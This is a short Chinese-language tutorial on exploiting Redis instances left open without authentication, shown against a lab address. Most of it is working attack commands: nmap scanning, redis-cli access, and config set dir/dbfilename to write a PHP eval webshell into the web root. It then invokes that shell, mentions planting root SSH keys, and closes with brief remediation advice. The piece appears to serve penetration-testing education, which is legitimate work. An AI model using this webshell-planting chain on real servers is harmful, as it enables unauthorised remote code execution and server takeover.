Web安全：Redis 未授权访问漏洞 测试.

Redis 默认情况下绑定在 6379 端口，然后如果没有进行添加防火墙规则避免其他非信任来源 IP 访问等相关安全策略，直接暴露在公网上。然后再没有设置密码或者设置了弱密码，因此导致此漏洞的产生.

---

目录：

Web安全：Redis 未授权访问漏洞 测试.

Redis 未授权访问漏洞的 危害：

Redis 未授权访问漏洞 测试：

第一步：使用 nmap 工具进行端口扫描.

第二步：查看是否可以连接 Redis 和 获取敏感信息.

第三步：利用 Redis 未授权漏洞上传 程序（木马）

第四步：访问 上传的程序（木马）

第五步：利用 上传的程序（木马）进行连接服务器获取控制权.

Redis 未授权访问漏洞 修复方法：

---

Redis 未授权访问漏洞的 危害：

黑客可以通过数据备份功能往磁盘写入后门文件

黑客无需认证就可以访问到内部数据，可能导致敏感信息泄露.

然后在 Redis 以 root 身份运行的话，攻击者可以给root账户写入SSH公钥文件，再直接SSH登录目标服务器.

---

Redis 未授权访问漏洞 测试：

第一步：使用 nmap 工具进行端口扫描.

nmap 服务器IP -p 查看的端口

nmap 192.168.0.101 -p 6379            //扫描 6379 端口是否开放.

---

第二步：查看是否可以连接 Redis 和 获取敏感信息.

sudo redis-cli -h 192.168.0.101        //连接 Redis 数据库.

info                                   //查看 敏感 信息.

---

第三步：利用 Redis 未授权漏洞上传 程序（木马）

config set dir /var/www/html        //在网站的根目录/var/www/html下写进去一个脚本.

config set dbfilename bgxg.php        //脚本名称为 bgxg.php

set webshell "<?php @eval($_POST['bgxg']); ?>"        // 脚本内容" 中 "的内容.

save            // 保存 刚刚写入的信息.

---

第四步：访问 上传的程序（木马）

http://192.168.0.101/bgxg.php        // bgxg.php 是刚刚写入的木马文件

bgxg=phpinfo();                      // phpinfo(); 查看服务器的信息.

---

第五步：利用 上传的程序（木马）进行连接服务器获取控制权.

---

Redis 未授权访问漏洞 修复方法：

（1）Redis 添加密码验证.

（2）禁止外网访问 Redis 端口服务.

（3）修改 Redis 服务 默认端口.